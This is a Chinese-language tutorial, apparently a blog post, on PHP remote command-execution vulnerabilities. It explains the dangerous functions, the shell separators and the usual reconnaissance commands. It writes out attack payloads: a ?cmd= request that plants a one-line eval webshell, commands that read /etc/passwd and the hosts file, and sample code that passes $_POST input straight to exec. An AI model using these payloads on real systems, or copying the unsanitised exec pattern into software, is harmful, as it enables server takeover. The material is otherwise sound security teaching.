网络安全深入学习第一课——热门框架漏洞(RCE-命令执行)

2023-09-16 15:54:13


一、RCE

------ 远程命令执行或者代码执行,因为RCE这个词的滥用,RCE的范围比较广,只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE。

------ RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。


二、命令执行/注入-概述

------ 应用有时需要调用一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen等,当用户调用这些函数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

------ 命令执行产生原因:Web应用的脚本代码在执行命令的时候过滤不严,从而注入一段攻击者能够控制的代码,在服务器上执行恶意指令。

------ 命令执行漏洞是PHP应用程序中最常见的漏洞之一。

------ 命令执行漏洞:直接调用操作系统命令。可以执行系统或应用指令(如CMD命令或bash命令)的漏洞,PHP命令执行漏洞主要基于一些函数的参数过滤不严导致。


三、命令执行-常见函数

常见的命令执行函数:

  • PHP:exec、shell_exec、system、passthru、popen、proc_open等
  • ASP.NET:System.Diagnostics.Start.Process、System.Diagnostics.Start.ProcessStartInfo等
  • Java:java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec等

四、PHP命令执行-常见函数

1、exec:

返回值:返回命令执行结果的最后一行内容,失败时返回 false

<?php
	echo exec($_POST["q"]);
?> 
<?php
	print exec($_POST["q"]);
?>

如下图,只会输出最后一行
在这里插入图片描述

2、system

------ 该函数会把执行结果输出,并把输出结果的作为字符串返回。

------ 如果 PHP 运行在服务器模块中,system() 函数,还会尝试在每行输出完毕之后,自动刷新 web 服务器的输出缓存,如果执行失败则返回false。

<?php
	highlight_file(__FILE__);                     
	system('whoami');
?>

highlight_file() 函数以字符串形式返回 突出显示的代码,
成功返回true,否则返回false

3、passthru

------ 执行外部程序并且显示原始输出。执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数。

<?php
	highlight_file(__FILE__);
	passthru('whoami');
?>

4、shell_exec

------ 通过 shell 执行命令并将完整的输出以字符串的方式返回。

<?php
	highlight_file(__FILE__);
	var_dump(shell_exec('ipconfig'));  
?>

5、反引号 backquote

------ shell_exec() 函数实际上仅是反撇号 (`) 操作符的变体

<?php echo `whoami`; ?>
这时候whoami会直接被当成命令来执行。

五、PHP命令执行-常见函数总结

------ 可执行命令的函数: system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open(),反引号也可以执行命令

  • system()、exec()、shell_exec()、passthru()以及反引号( ` )是可以直接传入命令并且函数会返回执行结果。

如 <?php system('ipconfig'); ?> <?php echo `whoami`; ?>

  • popen()、proc_open()函数不会直接返回执行结果,而是返回一个文件指针(通过文件指针就可对它所指的文件进行各种操作),命令是已经执行了
<?php popen('whoami >>D:/2.txt','r'); ?>

六、命令执行漏洞成因

------ 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。

------ 而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。


七、命令执行漏洞利用条件

  • 应用调用执行系统命令的函数
  • 将用户输入作为系统命令的参数拼接到了命令行中
  • 没有对用户输入进行过滤或过滤不严

八、命令执行漏洞分类

1、代码层过滤不严

商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用。

2、系统的漏洞造成命令注入

bash破壳漏洞(CVE-2014-6271)

3、调用的第三方组件存在代码执行漏洞

如WordPress中用来处理图片的ImageMagick组件
JAVA中的命令执行漏洞(struts2等)
ThinkPHP命令执行;


九、命令执行漏洞常用的命令

Windows

dir----查看文件目录
ipconfig----查看Windows的IP地址
arp -a----查看ARP缓存表
calc----在命令行打开计算器
regedit----打开注册表
netstat -ano----查看开放的端口信息

Linux

cat /etc/passwd----查看passwd文件
id----查看该用户的ID号
groups----查看用户所属的组
cat /etc/group----查看组信息
whoami----查看当前用户
pwd----查看当前路径
uname -a----查看主机信息
cat /etc/issue----查看主机的配置信息
netstat -pantu----查看开放的端口信息
netstat -nr----查看路由信息

十、命令执行漏洞原理

------ 在操作系统中,"&、|、||"都可以作为命令连接符使用,用户通过浏览器提交 执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。

------ 远程命令执行漏洞,指用户通过浏览器提交执行操作命令,由于服务器端,没有针对执行函数做过滤,就执行了恶意命令。


十一、命令执行漏洞使用的特殊字符

在这里插入图片描述

1、&

1&2用来分隔一个命令行中的多个命令。先运行第一个命令1,然后运行第二个命令2。
在这里插入图片描述

2、&&

1&&2,先运行第一个命令1,只有在符号&&前面的命令1运行成功时才运行该符号后面的命令2。
在这里插入图片描述

3、|

1|2,命令行的管道符号,将命令1的输出立即作为命令2的输入,它把输入和输出重定向结合在一起。(直接执行了后面的语句)
在这里插入图片描述

4、||

1||2,先运行第一个命令,只有在符号||前面的命令1未能运行成功时,才运行符号||后面的命令2。
在这里插入图片描述
在这里插入图片描述


十二、命令执行漏洞getshell

------ 攻击者直接继承web用户权限,可以在服务器上执行任意命令,危害特别大。

以下是几种常见的命令执行利用方式:

1、直接获取webshell

例如可以写入一句话木马:
?cmd=echo “<?php @eval($_REQUEST[123]); ?>” > D:\phpstudy\PHPTutorial\WWW\webshell.php

2、显示当前路径

例如可以提交参数 ?cmd=cd 来查看当前路径。

3、读文件

例如:?cmd=type c:\windows\system32\drivers\etc\hosts,来查看系统hosts文件。

4、写文件

例如可以提交参数 ?cmd=echo “<?php phpinfo(); ?>” > D:\shell.php


更多推荐

算法通过村第八关-树(深度优先)青铜笔记|经典算法题目

文章目录前言1.二叉树里面的双指针1.1判断两棵树是否相同1.2对称二叉树1.3合并二叉树2.路径专题2.1二叉树的所有路径2.2路径总和3.翻转的妙用总结前言提示:人类的底里是悲伤,我们都在用厚重的颜料,覆盖那些粗糙的线稿。--张皓宸《抬头看二十九次月亮》前面的练习才是开始,这理才是真正的进入算法的门槛,来迎接下一波

ELK 企业级日志分析系统

----------------------ELK概述----------------------------------------1、ELK简介ELK平台是一套完整的日志集中处理解决方案,将ElasticSearch、Logstash和Kiabana三个开源工具配合使用,完成更强大的用户对日志的查询、排序、统计需求

[刷题记录]牛客面试笔刷TOP101(二)

(一)传送门:[刷题记录]牛客面试笔刷TOP101(一)_HY_PIGIE的博客-CSDN博客目录1.合并二叉树2.二叉树的镜像3.判断是否为二叉搜索树4.判断是不是完全二叉树1.合并二叉树合并二叉树_牛客题霸_牛客网(nowcoder.com)思路:在后序遍历的基础上进行,两颗二叉树可能会有位置有空缺的情况.在一个子

Python基础学习笔记1(AI Studio)

地址:飞桨AIStudio星河社区-人工智能学习与实训社区课程地址:飞桨AIStudio星河社区-人工智能学习与实训社区课程地址:飞桨AIStudio星河社区-人工智能学习与实训社区课程地址:飞桨AIStudio星河社区-人工智能学习与实训社区AIStudio的Notebook项目的基本操作项目启停执行和调试多文件代码

JavaScript面试题整理(一)

数据类型篇1、JavaScript有哪些数据类型,它们的区别是什么?基本数据类型:number、string、boolean、undefined、NaN、BigInt、Symbol引入数据类型:ObjectNaN是JS中的特殊值,表示非数字,NaN不是数字,但是它的数据类型是数字,它不等于任何值,包括自身,在布尔运算时

ELK企业级日志分析系统

ELK概述为什么要使用ELK日志主要包括系统日志、应用程序日志和安全日志。系统运维和开发人员可以通过日志了解服务器软硬件信息、检查配置过程中的错误及错误发生的原因。经常分析日志可以了解服务器的负荷,性能安全性,从而及时采取措施纠正错误。往往单台机器的日志我们使用grep、awk等工具就能基本实现简单分析,但是当日志被分

如何进行网络编程?

网络编程是计算机科学领域中的一个重要主题,允许计算机之间通过网络进行通信和数据交换。在C语言中,网络编程通常涉及使用套接字(socket)API来创建、连接、发送和接收网络数据。本文将介绍如何进行基本的网络编程,包括创建套接字、建立连接、发送和接收数据,以帮助C语言初学者入门这一领域。1.套接字(Socket)简介套接

排序算法:计数排序

前文说到,19591959年77月,希尔排序通过交换非相邻元素,打破了O(n^2)的魔咒,使得排序算法的时间复杂度降到了O(nlogn)级,此后的快速排序、堆排序都是基于这样的思想,所以他们的时间复杂度都是O(nlogn)。那么,排序算法最好的时间复杂度就是O(nlogn)吗?是否有比O(nlogn)级还要快的排序算法

Netty面试题(二)

文章目录前言一、Netty的线程模型?二、TCP粘包/拆包的原因及解决方法?三、了解哪几种序列化协议?总结前言Netty的线程模型?TCP粘包/拆包的原因及解决方法?了解哪几种序列化协议?一、Netty的线程模型?Netty通过Reactor模型基于多路复用器接收并处理用户请求,内部实现了两个线程池,boss线程池和w

合肥先进光源国家重大科技基础设施项目及配套工程启动会纪念

合肥先进光源国家重大科技基础设施项目及配套工程启动会纪念卡西莫多合肥长丰岗集里肥鸭从此别泥塘先平场地设围栏进而工地筑基忙光阴似箭指日争源流汇智山水长国器西北扩新地家校又添新区园重器托举有群力大步穿梭两地间科教兴邦大国策技术盈身坦荡行基坑从今开挖砌础柱继而深潜立设计蓝图逐展开施工巧匠刻惊奇项颈昂起躲绞索目光如炬细察析及时

数据库小记-mysql-DDL、DML、DQL

MySQL是一个流行的关系型数据库管理系统,支持各种数据库操作语言(DataManipulationLanguage,DML)、数据库定义语言(DataDefinitionLanguage,DDL)和数据查询语言(DataQueryLanguage,DQL)。以下是它们的主要区别和示例:DDL(数据定义语言):DDL用

热文推荐